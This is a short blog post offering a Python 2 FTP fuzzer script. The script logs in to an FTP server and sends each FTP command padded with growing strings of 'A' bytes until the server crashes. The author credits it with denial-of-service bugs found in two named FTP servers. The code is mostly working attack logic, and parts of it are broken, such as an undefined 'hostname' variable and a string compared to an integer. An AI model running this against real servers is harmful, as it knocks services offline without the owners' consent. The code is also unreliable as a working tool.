this script help you for hunting bug. example i find two vulnerability ftp:
XM Easy Personal FTP Server 5.8 Remote Denial Of Service XM-ftp-dos.txt
FtpXQ FTP Server 3.0 Remote Denial Of Service Exploit ftpxq-dos.txt
[+] you must usage python 2.x
[+] fix cmdtest loop
#!/usr/bin/python
import socket, sys, time
banner = """
##############################################
## Iranian Pentesters Home ##
## Www.Pentesters.Ir ##
## PLATEN -[ H.jafari ]- ##
## Sample Ftp Fuzzer version 0.1 ##
## Code by: PLATEN ##
## E-mail && blog: ##
## h-jafari.blogspot.com ##
## pl4ten[at]gmail[dot]com ##
## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ##
## and all members in Pentesters.ir ##
##############################################
"""
print banner
ip = raw_input("IP: ")
username = raw_input("Username: ")
passwd = raw_input("Password: ")
byetesize = raw_input("Max byte size: ")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cmdtest=["USER","PASS","LIST","MKD","ABOR","CWD","ACCT","NSLT","DELE","APPE","PORT","PASV","NOOP",
"AUTH","HOST","LANG","FEAT","RMD","SIZE","XRMD",",XPWD","XCRC","XCUP","TYPE","RNFR","QUIT"]
try:
# if don't usage default port(21), change this.
sock.connect((hostname, 21))
r=sock.recv(1024)
print "[+] " + r
except:
print ("\n[-] Connection error!\n")
sys.exit(1)
try:
sock.send("user %s\r\n" %username)
except:
print ("[-] Username error!\n")
sys.exit(1)
try:
sock.send("pass %s\r\n" %passwd)
except:
print ("[-] PassWord error!\n")
sys.exit(1)
print "[+] Start Fuzzing...\n"
d = 1
for i in cmdtest :
while d <= byetesize :
payload= "\x41" * d
print "[+] Send evil string" ,d,"\n"
data = i +" %s\r\n"+payload
sock.send( data )
try:
sock.connect((hostname, 21))
d = d * 2
time.sleep(0.5)
except:
sock.close()
print "[+] Down!"
sys.exit(0)
No comments:
Post a Comment